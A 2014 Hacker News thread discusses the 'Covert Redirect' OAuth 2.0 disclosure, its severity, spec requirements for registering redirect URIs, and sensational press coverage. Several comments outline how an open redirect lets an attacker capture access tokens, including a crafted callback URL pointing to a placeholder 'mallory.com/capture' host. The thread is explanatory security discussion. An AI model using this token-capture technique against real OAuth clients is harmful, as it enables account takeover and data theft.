Hacker News new | past | comments | ask | show | jobs | submit login
OAuth 2.0 and OpenID Redirect Vulnerability (tetraph.com)
120 points by bevacqua on May 2, 2014 | hide | past | favorite | 56 comments

Here's my understanding of this: 1) Bob uses example.com

2) Bob has authorized example.com to use Bob's Twitter account on his behalf, using OAuth 2

3) example.com happens to have an open redirect, an annoying and rather pervasive type of security vulnerability generally considered to be low-severity. (e.g. Google: "we hold that the usability and security benefits of a small number of well-designed and closely monitored redirectors outweigh their true risks.")

4) Mallory can now own Bob's Twitter account from any IMG tag on the Internet.

Step 1: generate a carefully crafted redirect URL which will start an OAuth authorization with the redirect URL designed to hit example.com but get 302ed to a page Mallory controls.

Step 2: put that URL in an IMG tag

Step 3: cause Bob to load that image. Twitter, noting that Bob has already auth'ed example.com on this device, handily elides a re-login and re-authorization and redirects Bob to the carefully crafted URL on example.com, which redirects him to Mallory's server

Step 4: Mallory now has a token which gives them Bob's Twitter account to play with

Open redirects are a much more common issue than you'd think.

For example, we use elasticemail.com to send out emails. They encourage [1][2] people to setup a 'tracking' domain under your existing domain (ie: tracking.yourdomain.com). They then rewrite links in the emails that go out under their tracking domain. http://tracking.yourdomain.com/track?redirect=[youroriginall...

It turns out that their tracking service is effectively an open redirect and you've been encouraged by their documentation to setup the redirect. Now, if you have auth on your site via oauth2 (ie: facebook login), you've got a hole.

Something like this could easily be setup by the marketing department and the engineers wouldn't know anything about it.

Thanks to Egor Homakov for pointing this out to us.

  [1] http://support.elasticemail.com/kb/general-faq/why-do-my-links-route-through-the-elasticemailcom-domain-and-then-get-redirected-to-the-destination-url
  [2] http://elasticemail.com/post/what-is-a-custom-tracking-domain-and-why-is-it-important

The only aspect I'll take issue with is that in many (granted not all, but many) OAuth use-cases, the user is required to re-login to a site -- even if it was already authorized. The length of the cookie/token for an OAuth login varies, but more and more, I see very few services that don't require me to login again -- or at least manually click the "login" button.

So for step 3 to happen, Mallory needs to try to target a site that Bob is currently logged into or that has a session life that is still active. Otherwise, Bob still sees his Twitter login logo and he has to make a choice to click or retreat.

I am being a bit slow today. How did Mallory come into the picture at step 4? By exploiting some other web app vulnerability on example.com?

Example.com has an open redirect; say http://example.com/redirect?url=xxxxx

Craft the OAuth URL to Twitter passing the callback as http://example.com/redirect?url=http://mallory.com/capture.

Now Mallory can access the parameters passed back by Twitter at /capture on their server.


1. You have to look at the referer to get the tokens, no?

2. OAuth 1.0a isn't vulnerable because the requests are signed with a secret, correct?

my understanding is that OAuth 1.0a isn't vulnerable because in that spec, the access_token isn't part of the post-user-authorization redirect (http://tools.ietf.org/html/rfc5849#section-2.2) while it is in Oauth 2.0 (http://tools.ietf.org/html/rfc6749#section-4.2.2)

So, in Oauth 2.0 the redirect URI could be setup to expose the access token. In Oauth 1.0a, the only thing that could leak is the request token and verifier code, but without the original client credentials, they can't be exchanged for an access token.

Actual source: http://tetraph.com/covert_redirect/oauth2_openid_covert_redi...

I was expecting an authentication bypass vulnerability, but this is just an open redirect. It is not "serious".

I think this is even covered in the spec.

  The authorization server MUST require the following clients to
   register their redirection endpoint:

   o  Public clients.

   o  Confidential clients utilizing the implicit grant type.

   The authorization server SHOULD require all clients to register their
   redirection endpoint prior to utilizing the authorization endpoint.

The OAuth servers I have developed have done like GitHub does [1] and at least confirm the redirect given during auth starts with the application-level URI. I think it gives plenty of flexibility while still not openly redirecting. Edit: Or maybe I don't understand the flaw since it says GitHub is vulnerable...

1 - https://developer.github.com/v3/oauth/#redirect-urls

Good Oauth2.0 and later implementations enforce this. Note that Twitter does not fall into that category.

I'm relatively familiar with oAuth 2, but I don't quite grok this.

So, normally: I, a site that uses oauth to authorize someone Google / Twitter etc account register a redirect URI where people, after authorizing / denying, are sent with a access key.

The vuln is that my redirect URI can be exploited someone to send users onto a different site, with their access key?

How could an attacker manipulate a URL to redirect somewhere else? Content injection? Like some users whose name is a script that changes window.location? Doesn't nearly every templating language explicitly require special stuff like {{{ }}} for unsafe content?

If that's correct, it seems a little overblown. But maybe I'm wrong.

> How could an attacker manipulate a URL to redirect somewhere else?

A site begins writing software to OAuth with Facebook. They start by filling out a form on Facebook with app name and the callback URL to their site. They then write a handler on their site for dealing with the callback URL they expect to receive from Facebook after the user approves the connection with their app. However, the week before the company did OAuth integration, there was a ticket opened for 'redirect user to correct page after login' which was implemented with a '?next=http://urlofyourchosing.com/' decorator handler written by the Swedish intern.

The redirect parameter isn't going to be compared by Facebook. Only the base URL is going to be checked to ensure it matches.

Once Oauth integration is complete and tested, the site launches. They get on the front page of HN, Reddit and Mashable and sign up about 100K users in a few weeks. In the meantime, a bad agent discovers the flaw in their login flow and tests the behavior and discovers the ?next redirect 'venerability'. They know the site uses Facebook, so they craft a URL to do OAuth with Facebook, then redirect the user to the attacking site by using the ?next parameter located in the third party's website code. They then use the current bad actor method of propagating their evil URLs and .... profit?

Impact: Any action by the user allowing access to data will, in theory, allow the attacker to view the information they gave the site access to and, possibly, more information than the user originally approved for the site if they accidently chose another security scope. It should be noted that all access by the user to both Facebook and the attacked website will be logged by their respective servers.

I implemented an OAuth2 workflow with Github to an AppEngine project last year, so I'm at least passingly familiar with what goes on under the hood with the flows. Still, I could be missing something here. I might try to hack up a working example to test my theory.

I read all the above and I still don't see how the attacker would "gain access" to the user's info on the platform. How do they get the bearer token?

?next=URL is usually implemented to redirect to the URL, and won't propagate the bearer token off the app to the attacker's site. What Am I missing?

Given you implemented it correctly, I would agree with you. A bad implementation would allow for preservation of the URL's parameters ala urllib.urlencode(self.request.params) or similar, which would contain the token.

This assumes the url that process the ?next request pass the info in a Crossdomain way... Ie get vars or post.

Everyone does cookies or backend storage.

unless you can compromise the target dns, this is impossible to exploit except for very lousy sites... But if they are bad to this point, you probably already have a local shell access

When you are redirected from Facebook - either after clicking "Accept" or in an implicit flow - to the page with the next parameter, and that page redirects to attacker.com, then attacker.com will have access to the referer header†, which contains the access token. Using this access token, an attacker could extract the sensitive information from the victim's Facebook account.

† there are a few exception when referer header isn't shown, e.g. HTTPS->HTTP redirect, but an attacker could make sure that the referer header would be sent for the majority of victims

Always assumed the response was via post... It's silly to use get/url for that. Any ad or external library on the page can already see that then.. Everyone logs referer headers. Even using custom fonts directly from Google is already advertising your tokens...

From the Q&A:

> Covert Redirect is based on vulnerability Open Redirect. An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation (OWASP). So Covert Redirect is an applicaiton that takes a paramter and redirects a user to the parameter value with improper validation. Usually this is the of result of overconfidence of its partnership.

Seems like a known flaw in OAuth2.

The flow does not originate at your site. Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

The URL is generated by a malicious party. The URL constructed (1) sends the user to Google / Twitter for authentication, (2) includes a return URL of your open redirector, and (3) has your open redirect send you on to an evil site.

> Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

Sorry, I don't understand this sentence.

The redirect URI is not normally passed to Google / FB / Instagram dynamically, but normally registered with Google / FB / Instagram once, when you set up an app with them (and get a secret key etc).

If someone else registered their own app with their own redirector, they wouldn't have my secret key.

Edit: removed Twitter, they use oAuth 1 which is strange / different / weird.

No, you do pass the URI dynamically, it's a required part of the Access Token Request: http://tools.ietf.org/html/draft-ietf-oauth-v2-16#section-4....

It's just that with a decent implementation, you should also be required to register it beforehand with the provider.

Not just a decent implementation; an implementation which meets the spec. This is not a problem with OAuth2, which explicitly requires registration of URIs where the implicit grant type is used, and covers other cases well in the Security Considerations section.

That makes a lot of sense: I've only really dealt with oAuth 2, as oAuth 1.0a is vastly more complicated and only Twitter seems to still use it.

Thanks icebraining & vertex-four.

I'm trying to understand this too. This is only a problem if the OAuth provider (Google, Twitter, etc) does not validate the URL that the client is trying to redirect the user to after the user has authorized the app, correct?

Typically you pre-register a whitelist of redirect URLs with your OAuth provider. For example, you might whitelist example.com/app/* because you control the app and assume that you won't do anything evil. If /app/ includes an open redirect (generally considered to be Severity: Nominal), your application can be made to attack every user who grants it permissions, to the limit of the permissions they entrust your application with.

Not sure if this is news. The lead author of OAuth 2 resigned from the OAuth working group 2 years ago, citing all the security flaws inherent in the OAuth 2 spec.


OP just spells out one way to take advantage of OAuth 2, and tacks on a sensational title.

Agreed; I thought that the general consensus was that OAuth2 was severely flawed (and why many sites stuck with OAuth1). Been a few years since I worked with OAuth though, so I could be wrong.

OpenID-Connect is the most current spec in that world.

This seems painfully sensationalized to me. Unrestricted OAuth redirect URIs paired with not requiring signed requests has been known to be dangerous. Google and Facebook both have configurable whitelists for OAuth redirect URIs.

Yeah, I was struggling to understand this, since I recently implemented a Facebook OAuth client and it prevented me from setting any redirection URL outside the configured domain, so I don't see how is Facebook vulnerable.

Frankly, much ado about nothing.

This is only a vulnerability if you have an "open redirect" somewhere on your domain.

Do you have any URLs that look like this?


That's an open redirect, and can be used by an attacker to work around the domain whitelist.

Open redirects are bad news for a bunch of other reasons. The solution is to always guard them with an additional signed parameter derived from the URL and a secret.

The point is that large OAuth2 providers have open redirects themselves at the authorization endpoint, by not requiring all clients to register their redirection URIs. This directly violates the spec, as per section, and is further warned against in section 10.15.

In combination with the implicit flow, this means that an attacker can create ask the provider to authorize any client to access their data, but actually send the access token to the attacker's URL.

The interesting thing is... if providers actually followed all MUSTs and SHOULDs, this would not be a problem. The providers explicitly decided to allow this variety of problem to happen.

Correct me if I'm wrong but it seems that this isn't even old news. It's by design - something inherent to OAuth authentication scheme.

Also both CNet and the original are so light on details it's scary. I get the feeling though that we've entered an era for "vulnerability sites" - instead of CVEs we're now getting marketing.

>instead of CVEs we're now getting marketing.

Well that is what patio11 and other were calling for after heartbleed. More marketing! More selling yourself! Always be selling!

Yeah, that guy's site reminds me of the site which was set up for the heartbleed vulnerability. Heartbleed probably justified its own site since it was such a big deal. I'm not sure this qualifies. Maybe people are starting to think that they can call attention to known weaknesses with a dedicated site and get some cred. As you said, kind of a marketing tactic.

1) it is nothing new 2) original article is so unclear, I don't comprehend which of two bugs author meant

This is an example of using the marketing lessons[1] for Heartbleed to over-promote a known issue that is actually accounted for IN the OAuth 2.0 spec.

Not every technology reporter is spreading false fear, however. If I got anything wrong in my post, reach out and I'll gladly correct.

[1]: http://mashable.com/2014/05/02/oauth-openid-not-new-heartble...

Dubbed "Covert Redirect," the flaw could enable phishing sites to grab a user's login information.

I realize you write for a generalist audience, but this phrasing does not evince understanding of the vulnerability.

Users can choose to trust third-party applications to do certain things on Facebook/Google/Twitter/etc on their behalf. This vulnerability allows an attacker who is not affiliated with that trusted third party to perform those same actions. Those actions include, but are not limited to, "share information about me with my trusted 3rd party."

This is not related to phishing sites. At all. It is possible to compromise a user without ever needing to ask for their credentials (on either a phishing site or a legitimate site), because users are customarily logged into Facebook/Google/Twitter/etc. That's a major part of the attraction for using them as net-wide identity providers, both for third-party sites and for users.

It's important to note, however, that in order to take advantage of this vulnerability in the first place, a user has to click on a link or visit a malicious website.

Security researchers generally consider this to not be a meaningful hurdle, as you can induce people's browsers to load a URL without any action on their part. If you can post a cat photo, you can post an attack. Have you viewed a cat photo recently from someone who you wouldn't trust with operating your Facebook account? Well, if you've previously entrusted a third party to use your Facebook (or similar) account on your behalf and that third party has an open redirect on their website, that cat photo could have also operated your Facebook account to the same extent you permitted the third party to.

To avoid offering up information to a malicious website, users should only log into Facebook or other services through sites that they trust. If a site looks sketchy, don't do it. Standard anti-phishing practices apply here.

This will not, in fact, help. That's the point. You trust ESPN.com to not abuse you. You use their integration with Facebook. You diligently check your browser and are sure you're only looking at ESPN and Facebook. Everything goes perfectly.

Three weeks later a cat photo on a website which is neither ESPN nor Facebook steals your information.

Maybe a more motivational example is operating your Twitter account for you? Say you enter a contest on ESPN. ESPN might ask, as a condition of the contest, that you Tweet "ESPN: it's not on your cell phone #wegetsocialmedia." There exists a particular way to implement that which gives them the ability to tweet whatever they want through your account, but you might come to the semi-sensible decision that they're ESPN so they're clearly not going to do anything malicious with your Twitter account.

3 weeks later, you load a cat photo, and your followers start asking you why you suddenly are interested in promoting alternative takes on Middle Eastern geopolitics or encouraging them to buy male enhancement supplements.

Some good points all around -- I've made edits trying to better frame the scenario.

>Generalist audience point

That actually was a rephrasing of my original description.

The point about malicious sites -- phishing sites -- is that those are the sites (or compromised sites) that will serve links with the bad redirects.

Co-existing with an XSS flaw not-withstanding (which has happened before and is realistically the best vector to get to alter the links), I don't think it's unfair to frame this as something that happens as a result of clicking on a bad link from a site that is either malicious or has been hacked.

Obviously, there are exceptions -- and I'll make that more clear -- but I'm seeing it framed as if "every Facebook login you click could be hijacked" -- and that's just not true.

>To the ESPN point

Right -- if ESPN gets hacked or an XSS flaw takes place to append their links and redirects happens -- that's definitely a real problem. That's why some of the onus is on ESPN, to make sure they define their URI redirects in OAuth 2.0. It's also why Facebook should make it an absolute requirement for using Facebook login.

Not to mitigate the fact that this is a real flaw at all - but I think we can all agree this isn't some new discovery. It's a well-known problem. Calling this the new Heartbleed won't make it any better.

If the redirect URI is registered and compared by the Authorization server as required by the OAuth2 and OpenID Connect specifications this is not a issue.

The OAuth 2 implicit flow encodes the access token in the URI fragment to prevent leaking in referrer or 302 redirects.

It seems that the person who discovered this Facebook vulnerability somehow broke fragment processing in there browser to make there YouTube video work.

I will say that ESPN went to a lot of work to create a open redirector that preserved query parameters from the origin URI, you don't see that every day. So if anything the discoverer should get some credit for finding a ESPN issue, but it is not more general than that and could not be used to exploit Facebook unless used in combination with some other browser bug to turn of fragment processing in the browser.

Just to be sure, how is Google's OAuth2 implementation vulnerable to this?

As I understand it: the attacker exploits the fact that your application does not validate the redirect_uri parameter. Google's API keys all have whitelists for redirect_uri's. So those can't be exploited, right? Then the only problem is that those redirect_uri's themselves can perform redirects (in Google's case you can put arbitrary data in the 'state' get parameter so you could put another redirect_uri in there) but you can validate those too (on your whitelisted redirect_uri page... and you are advised to do CSRF checks anyway). So in this case, where is the vulnerability? I don't see it.

I'm familiar with the oauth2 spec (rfc6749). I can't find enough details to actually understand the claimed vulnerability. Does it a specific flow? It sounds like the Implicit Grant (http://tools.ietf.org/html/rfc6749#section-4.2)

> Covert Redirect flaw uses the real site address for authentication.

That is so vague. Are they claiming the attacker is hijacking the redirect_uri parameter?

Are they saying that these third parties aren't comparing the redirect_uri? I can't think of a oauth2 server I've interacted with as a developer that hasn't required you to register a redirect_uri.

Anyone have more details?

Most important is this line which demonstrates not only does the attacker need to social engineer a user, it has to be done via a vulnerable website:

> The patch of this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist. Then there would be no room for attacks. However, in the real world, a large number of third-party applications do not do this due to various reasons.

Facebook, etc aren't insecure directly, their 3rd party partners are for not implementing a URL whitelist. This website chose to bury that fact. This explains why Facebook is aware of the issue and did not address it.

It turns out, identity, authentication and security in general are hard.

In some context, it takes episodes like the NSA, heartbleed and this OAuth nonsense to remind us how important knowing who you're talking to is on the Internet. It's hard to determine authenticity heuristicly and even harder with faulty signals.

More transparent security seems like a positive thing and yet the market forces are strictly against such an idea for obvious reasons (witness do not track).

I don't know how this will shake out, but if history has told me anything, it's to be hopeful for a better tomorrow.

We changed the url from [1] and demoted the post since the consensus in the thread is that it's overblown.

1. http://www.cnet.com/news/serious-security-flaw-in-oauth-and-...

Thank you for the transparency here.

Can I respectfully suggest that, in the future, consensus among HN readers is not always sufficient to judge whether certain facts about nature are actually true or not? I don't know whether it's the fault of our Chinese not being as good as this gentleman's English or just a bum draw on software security commenters today, but my read of this thread is few people understand the claim well enough to state whose what is at risk, to say nothing about judging its severity.

> consensus among HN readers is not always sufficient to judge

No question that's true. I'm painfully aware of it.

Moderating the front page is a guessing game. We're not experts in everything (or, if it comes to that, anything), so we guess wrong. But we always welcome correction.

If we thought the article was false, we would have buried it. The reason we penalized it was rather because it spent several hours getting upvoted in part (I surmise) because of the sensationalism of the original article, which is mostly what people were complaining about. We put a moderate penalty on the article as a way of rebalancing that, and also because several other things about this article seem (<-- that's another guess) a bit below the usual standard.

If this is wrong, I'm happy to reverse the decision.

How is this any different than the signed request (redirect_uri) vulnerability? http://homakov.blogspot.com/2014/01/two-severe-wontfix-vulne...

Not different at all.

Heh, thanks Egor!

A bigger question I have is, what if an attacker gets access to your database? Don't they get access to ALL user data of your service in the open? Do we hash and salt the passwords only because of password re-use?

I don't see how this is 'breaking news', pretty sure oauth has many known issues similar. This is nothing at all like heartbleed.

Wow they even made a logo for this vulnerability of minor severity.

Yeah, and the logo is explained before any serious details about the actual vulnerability are even mentioned.

But there it is with Hearbleed in the same cnet article so it must be serious. So serious. Wow.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact